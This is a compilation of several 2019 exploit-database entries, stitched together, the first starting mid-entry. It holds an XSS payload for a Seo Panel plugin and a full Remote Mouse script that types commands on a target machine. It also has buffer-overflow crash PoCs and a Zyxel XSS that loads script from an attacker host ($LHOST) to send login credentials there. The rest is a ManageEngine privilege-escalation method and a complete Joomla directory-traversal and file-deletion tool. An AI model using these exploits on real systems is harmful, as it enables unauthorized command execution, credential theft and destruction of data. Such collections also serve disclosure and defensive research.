# Software Link: https://www.seopanel.in/plugin/d/19/newsletter-plugin/demo/
# Demo Link: https://www.seopanel.in/plugin/showdemo/19/
# Version: 1.2.0
# Tested on: WIN7_x68/Linux
# CVE : N/A

# Description:
----------------------
Seo Panel Plugin Newsletter 1.2.0 suffers from a Cross-site Scripting vulnerability.

# POC:
----------------------
1. Access the following path http://[PATH]/plugins/newsletter/unsubscribemaillist.php
2. Manipulate the parameter "email" with your own XSS payload.

# Request:
----------------------
GET /plugins/newsletter/unsubscribemaillist.php?email=<htML/+/ONMOuSeOvEr+=+(confirm)(document.cookie)// HTTP/1.1
Host: sp.seopanel.in
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

"""
# Exploit Title: Remote Mouse 3.008 Failure to Authenticate
# Date: 4/9/2019
# Exploit Author: 0rphon
# Software Link: https://www.remotemouse.net/
# Version: 3.008
# Tested on: Windows 10

Remote Mouse 3.008 fails to check for authenication and will execute any command any machine gives it
This script pops calc as proof of concept (albeit a bit slowly)
It also has an index of the keycodes the app uses to communicate with the computer if you want to mess around with it yourself
"""

#!/usr/bin/python2
from socket import socket, AF_INET, SOCK_STREAM, SOCK_DGRAM
from time import sleep
from sys import argv

def Ping(ip):
    try:
        target = socket(AF_INET, SOCK_STREAM)
        target.settimeout(5)
        target.connect((ip, 1978))
        response=target.recv(1048)
        target.close()
        if response=="SIN 15win nop nop 300":
            return True
        else: return False
    except:
        print("ERROR: Request timed out")



def MoveMouse(x,y,ip):
    def SendMouse(command,times,ip):
        for x in range(times):
            target = socket(AF_INET, SOCK_DGRAM)
            target.sendto(command,(ip,1978))
            sleep(0.001)
    if x>0:
        command="mos  5m 1 0"
        SendMouse(command,x,ip)
    elif x<0:
        x=x*-1
        command="mos  5m -1 0"
        SendMouse(command,x,ip)
    if y>0:
        command="mos  5m 0 1"
        SendMouse(command,y,ip)
    elif y<0:
        y=y*-1
        command="mos  6m 0 -1"
        SendMouse(command,y,ip)



def MousePress(command,ip,action="click"):
    if action=="down":
        target = socket(AF_INET, SOCK_DGRAM)
        target.sendto((command+" d"),(ip,1978))
    elif action=="up":
        target = socket(AF_INET, SOCK_DGRAM)
        target.sendto((command+" u"),(ip,1978))
    elif action=="click":
        target = socket(AF_INET, SOCK_DGRAM)
        target.sendto((command+" d"),(ip,1978))
        target.sendto((command+" u"),(ip,1978))
    else: raise Exception('MousePress: No action named "'+str(action)+'"')


def SendString(string,ip):
    for char in string:
        target = socket(AF_INET, SOCK_DGRAM)
        target.sendto(characters[char],(ip,1978))



class mouse:
    leftClick="mos  5R l"
    rightClick="mos  5R r"
    middleClick="mos  5R m"

characters={
"A":"key  8[ras]116", "B":"key  8[ras]119", "C":"key  8[ras]118", "D":"key  8[ras]113", "E":"key  8[ras]112", 
"F":"key  8[ras]115", "G":"key  8[ras]114", "H":"key  8[ras]125", "I":"key  8[ras]124", "J":"key  8[ras]127", 
"K":"key  8[ras]126", "L":"key  8[ras]121", "M":"key  8[ras]120", "N":"key  8[ras]123", "O":"key  8[ras]122", 
"P":"key  8[ras]101", "Q":"key  8[ras]100", "R":"key  8[ras]103", "S":"key  8[ras]102", "T":"key  7[ras]97", 
"U":"key  7[ras]96", "V":"key  7[ras]99", "W":"key  7[ras]98", "X":"key  8[ras]109", "Y":"key  8[ras]108", 
"Z":"key  8[ras]111",

"a":"key  7[ras]84", "b":"key  7[ras]87", "c":"key  7[ras]86", "d":"key  7[ras]81", "e":"key  7[ras]80", 
"f":"key  7[ras]83", "g":"key  7[ras]82", "h":"key  7[ras]93", "i":"key  7[ras]92", "j":"key  7[ras]95", 
"k":"key  7[ras]94", "l":"key  7[ras]89", "m":"key  7[ras]88", "n":"key  7[ras]91", "o":"key  7[ras]90", 
"p":"key  7[ras]69", "q":"key  7[ras]68", "r":"key  7[ras]71", "s":"key  7[ras]70", "t":"key  7[ras]65", 
"u":"key  7[ras]64", "v":"key  7[ras]67", "w":"key  7[ras]66", "x":"key  7[ras]77", "y":"key  7[ras]76", 
"z":"key  7[ras]79",

"1":"key  6[ras]4", "2":"key  6[ras]7", "3":"key  6[ras]6", "4":"key  6[ras]1", "5":"key  6[ras]0",
"6":"key  6[ras]3", "7":"key  6[ras]2", "8":"key  6[ras]13", "9":"key  6[ras]12", "x0":"key  6[ras]5",

"\n":"key  3RTN", "\b":"key  3BAS", "":"key  7[ras]21",

"+":"key  7[ras]30", "=":"key  6[ras]8", "/":"key  7[ras]26", "_":"key  8[ras]106", "<":"key  6[ras]9", 
">":"key  7[ras]11", "[":"key  8[ras]110", "]":"key  8[ras]104", "!":"key  7[ras]20", "@":"key  8[ras]117", 
"#":"key  7[ras]22", "$":"key  7[ras]17", "%":"key  7[ras]16", "^":"key  8[ras]107", "&":"key  7[ras]19", 
"*":"key  7[ras]31", "(":"key  7[ras]29", ")":"key  7[ras]28", "-":"key  7[ras]24", "'":"key  7[ras]18", 
'"':"key  7[ras]23", ":":"key  7[ras]15", ";":"key  7[ras]14", "?":"key  7[ras]10", "`":"key  7[ras]85", 
"~":"key  7[ras]75", "\\":"key  8[ras]105", "|":"key  7[ras]73", "{":"key  7[ras]78", "}":"key  7[ras]72",
",":"key  7[ras]25", ".":"key  7[ras]27"
}


def PopCalc(ip):
    MoveMouse(-5000,3000,ip)
    MousePress(mouse.leftClick,ip)
    sleep(1)
    SendString("calc.exe",ip)
    sleep(1)
    SendString("\n",ip)
    print("SUCCESS! Process calc.exe has run on target",ip)


def main():
    try:
        targetIP=argv[1]
    except:
        print("ERROR: You forgot to enter an IP! example: exploit.py 10.0.0.1")
        exit()
    if Ping(targetIP)==True:
        PopCalc(targetIP)
    else:
        print("ERROR: Target machine is not running RemoteMouse")
        exit()

if __name__=="__main__":
    main()

# -*- coding: utf-8 -*-
# Exploit Title: PCHelpWareV2 1.0.0.5 - 'SC' Denial of Service (PoC)
# Date: 15/04/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://www.uvnc.com/home.html
# Software Link: http://www.uvnc.eu/download/pchw2/PCHelpWareV2.msi
# Version: 1.0.0.5
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script "PCHelpWareV2_create_.py", it will create a image "exploit.bmp"
# 2.- Open PCHelpWareV2 Viewer
# 3.- Go to Tools -> Create SC
# 4.- Click on button -> Browse (any "Browse" button), and select the 'exploit.bmp' image created
# 5.- Click on button -> Create SC
# 6.- Crashed

buffer = "\x41" * 10000

f = open ("exploit.bmp", "w")
f.write(buffer)
f.close()

# -*- coding: utf-8 -*-
#!/usr/bin/python

# Exploit Title: AdminExpress 1.2.5 - Denial of Service (PoC)
# Date: 2019-04-12
# Exploit Author: Mücahit İsmail Aktaş
# Software Link: https://admin-express.en.softonic.com/
# Version: 1.2.5.485
# Tested on: Windows XP Professional SP2

# Description:
#
# 1) Click the "System Compare" button
# 2) Paste the payload in the "Folder Path" (left)
# 3) Click the scales icon (in the middle, right side of "Folder Path")
#


buffer = "A" * 5000

print("Payload: \n\n" + buffer + "\n")

# -*- coding: utf-8 -*-
# Exploit Title: PCHelpWareV2 1.0.0.5 - 'Group' Denial of Service (PoC)
# Date: 15/04/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://www.uvnc.com/home.html
# Software Link: http://www.uvnc.eu/download/pchw2/PCHelpWareV2.msi
# Version: 1.0.0.5
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script "PCHelpWareV2.py", it will create a new file "PCHelpWareV2.txt"
# 2.- Copy the text from the generated PCHelpWareV2.txt file to clipboard
# 3.- Open PCHelpWareV2 Viewer
# 4.- Go to Properties
# 5.- Paste clipboard in 'Group' field and click on button 'Ok'
# 6.- Crashed

buffer = "\x41" * 100
f = open ("PCHelpWareV2.txt", "w")
f.write(buffer)
f.close()

# Exploit Title: Reflected XSS on Zyxel login pages
# Date: 10 Apr 2019
# Exploit Author: Aaron Bishop
# Vendor Homepage: https://www.zyxel.com/us/en/
# Version: V4.31
# Tested on: ZyWall 310, ZyWall 110, USG1900, ATP500, USG40 - weblogin.cgi, webauth_relogin.cgi
# CVE : 2019-9955

1. Description
==============

Several Zyxel devices are vulnerable to a reflected Cross-Site Scripting via the
mp_idx parameter on weblogin.cgi and webauth_relogin.cgi.

2. Proof of Concept
=============

Host a malicious file JavaScript file named 'z', or any other single character,
locally.  The contents of 'z' for the following example are:


-----
$("button").click(function() {
    $.get("//$LHOST", { username: $("input:text").val(), password: $("input:password").val(), host: location.hostname});
});
-----


Close the mp_idx variable with "; and Use the getScript functionality of jQuery
to include the malicious file: 

Request:

GET /?mobile=1&mp_idx=%22;$.getScript(%27//$LHOST/z%27);// HTTP/1.1
Host: $RHOST
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1



Response:

HTTP/1.1 200 OK
Date: Wed, 10 Apr 2019 23:13:39 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: Mon, 16 Apr 1973 13:10:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 7957

<!DOCTYPE html>
<html>
<head>
<title>Welcome</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta charset="utf-8">
<meta http-equiv="pragma" content="no-cache">
<link href="/ext-js/mobile/css/jquery.mobile-1.4.2.min.css?v=180711001117" rel="stylesheet" type="text/css">
<link href="/ext-js/mobile/css/style.css?v=180711001117" rel="stylesheet" type="text/css">
<link href="/ext-js/mobile/css/theme.css?v=180711001117" rel="stylesheet" type="text/css">
<link rel="stylesheet" type="text/css" href="/logo/mobile_custmiz_page.css?v=180711001117" /> 
<script src="/ext-js/mobile/js/jquery-1.8.2.min.js?v=180711001117" type="text/javascript"></script>
<script src="/ext-js/mobile/js/jquery.mobile-1.4.2.min.js?v=180711001117" type="text/javascript"></script>
<script type="text/javascript" src="/lang/language_panel.js?v=180711001117"></script>
<script language="JavaScript">
  var errorNum = 0;
  var mp_idx = "";$.getScript('//$LHOST/z');//";
...


When the login form is submitted, the host for the malicious file gets a request
containing the login credentials and target system:

$LHOST - - [10/Apr/2019 23:04:41] "GET /z?_=1554937481076 HTTP/1.1" 200 -
$LHOST - - [10/Apr/2019 23:04:49] "GET /?username=test&password=test&host=$RHOST HTTP/1.1" 200 -

# Exploit Title: Zoho ManageEngine ADManager Plus 6.6 (Build < 6659) Privilege Escalation
# Date: 15th April 2019
# Exploit Author: Digital Interruption
# Vendor Homepage: https://www.manageengine.co.uk/
# Version: 6.6 (Build 6658)
# Tested on: Windows Server 2012 R2
# CVE : CVE-2018-19374

Due to weak permissions setup on the bin, lib and tools directories within the ManageEngine installation directory, it is possible for any authenticated user to modify several core files.

To escalate privileges to that of LOCAL SYSTEM, drop a payload onto the system and then add a line to bin\ChangeJRE.bat to execute it every time the system is rebooted.

# Exploit Title: Joomla Core (1.5.0 through 3.9.4) - Directory Traversal && Authenticated Arbitrary File Deletion
# Date: 2019-March-13
# Exploit Author: Haboob Team
# Web Site: haboob.sa
# Email: research@haboob.sa
# Software Link: https://www.joomla.org/
# Versions: Joomla 1.5.0 through Joomla 3.9.4
# CVE : CVE-2019-10945
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10945
#
# Usage:
#  List files in the specified directory:
#  python exploit.py --url=http://example.com/administrator --username=<joomla-manager-username> --password=<joomla-manager-password> --dir=<directory name>
#
#  Delete file in specified directory
#  python exploit.py --url=http://example.com/administrator --username=<joomla-manager-username> --password=<joomla-manager-password> --dir=<directory to list>  --rm=<file name>


import re
import tempfile
import pickle
import os
import hashlib
import urllib

try:
    import click
except ImportError:
    print("module 'click' doesn't exist, type: pip install click")
    exit(0)

try:
    import requests
except ImportError:
    print("module 'requests' doesn't exist, type: pip install requests")
    exit(0)
try:
    import lxml.html
except ImportError:
    print("module 'lxml' doesn't exist, type: pip install lxml")
    exit(0)

mediaList = "?option=com_media&view=mediaList&tmpl=component&folder=/.."

print '''
# Exploit Title: Joomla Core (1.5.0 through 3.9.4) - Directory Traversal && Authenticated Arbitrary File Deletion
# Web Site: Haboob.sa
# Email: research@haboob.sa
# Versions: Joomla 1.5.0 through Joomla 3.9.4
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10945    
 _    _          ____   ____   ____  ____  
| |  | |   /\   |  _ \ / __ \ / __ \|  _ \ 
| |__| |  /  \  | |_) | |  | | |  | | |_) |
|  __  | / /\ \ |  _ <| |  | | |  | |  _ < 
| |  | |/ ____ \| |_) | |__| | |__| | |_) |
|_|  |_/_/    \_\____/ \____/ \____/|____/ 

'''
class URL(click.ParamType):
    name = 'url'
    regex = re.compile(
        r'^(?:http)s?://'  # http:// or https://
        r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|'  # domain...
        r'localhost|'  # localhost...
        r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'  # ...or ip
        r'(?::\d+)?'  # optional port
        r'(?:/?|[/?]\S+)$', re.IGNORECASE)

    def convert(self, value, param, ctx):
        if not isinstance(value, tuple):
            if re.match(self.regex, value) is None:
                self.fail('invalid URL (%s)' % value, param, ctx)
        return value


def getForm(url, query, cookie=''):
    r = requests.get(url, cookies=cookie, timeout=5)
    if r.status_code != 200:
        print("invalid URL: 404 NOT FOUND!!")
        exit(0)
    page = r.text.encode('utf-8')
    html = lxml.html.fromstring(page)
    return html.xpath(query), r.cookies


def login(url, username, password):
    csrf, cookie = getForm(url, '//input/@name')
    postData = {'username': username, 'passwd': password, 'option': 'com_login', 'task': 'login',
'return': 'aW5kZXgucGhw', csrf[-1]: 1}

    res = requests.post(url, cookies=cookie.get_dict(), data=postData, allow_redirects=False)
    if res.status_code == 200:
        html = lxml.html.fromstring(res.text)
        msg = html.xpath("//div[@class='alert-message']/text()[1]")
        print msg
        exit()
    else:
        get_cookies(res.cookies.get_dict(), url, username, password)


def save_cookies(requests_cookiejar, filename):
    with open(filename, 'wb') as f:
        pickle.dump(requests_cookiejar, f)


def load_cookies(filename):
    with open(filename, 'rb') as f:
        return pickle.load(f)


def cookies_file_name(url, username, password):
    result = hashlib.md5(str(url) + str(username) + str(password))
    _dir = tempfile.gettempdir()
    return _dir + "/" + result.hexdigest() + ".Jcookie"


def get_cookies(req_cookie, url, username, password):
    cookie_file = cookies_file_name(url, username, password)
    if os.path.isfile(cookie_file):
        return load_cookies(cookie_file)
    else:
        save_cookies(req_cookie, cookie_file)
        return req_cookie


def traversal(url, username, password, dir=None):
    cookie = get_cookies('', url, username, password)
    url = url + mediaList + dir
    files, cookie = getForm(url, "//input[@name='rm[]']/@value", cookie)
    for file in files:
        print file
    pass


def removeFile(baseurl, username, password, dir='', file=''):
    cookie = get_cookies('', baseurl, username, password)
    url = baseurl + mediaList + dir
    link, _cookie = getForm(url, "//a[@target='_top']/@href", cookie)
    if link:
        link = urllib.unquote(link[0].encode("utf8"))
        link = link.split('folder=')[0]
        link = link.replace("folder.delete", "file.delete")
        link = baseurl + link + "folder=/.." + dir + "&rm[]=" + file
        msg, cookie = getForm(link, "//div[@class='alert-message']/text()[1]", cookie)
        if len(msg) == 0:
            print "ERROR : File does not exist"
        else:
            print msg
    else:
        print "ERROR:404 NOT FOUND!!"


@click.group(invoke_without_command=True)
@click.option('--url', type=URL(), help="Joomla Administrator URL", required=True)
@click.option('--username', type=str, help="Joomla Manager username", required=True)
@click.option('--password', type=str, help="Joomla Manager password", required=True)
@click.option('--dir', type=str, help="listing directory")
@click.option('--rm', type=str, help="delete file")
@click.pass_context
def cli(ctx, url, username, password, dir, rm):
    url = url+"/"
    cookie_file = cookies_file_name(url, username, password)
    if not os.path.isfile(cookie_file):
        login(url, username, password)
    if dir is not None:
        dir = dir.lstrip('/')
        dir = dir.rstrip('/')
        dir = "/" + dir
        if dir == "/" or dir == "../" or dir == "/.":
            dir = ''
    else:
        dir = ''
    print dir
    if rm is not None:
        removeFile(url, username, password, dir, rm)
    else:
        traversal(url, username, password, dir)


cli()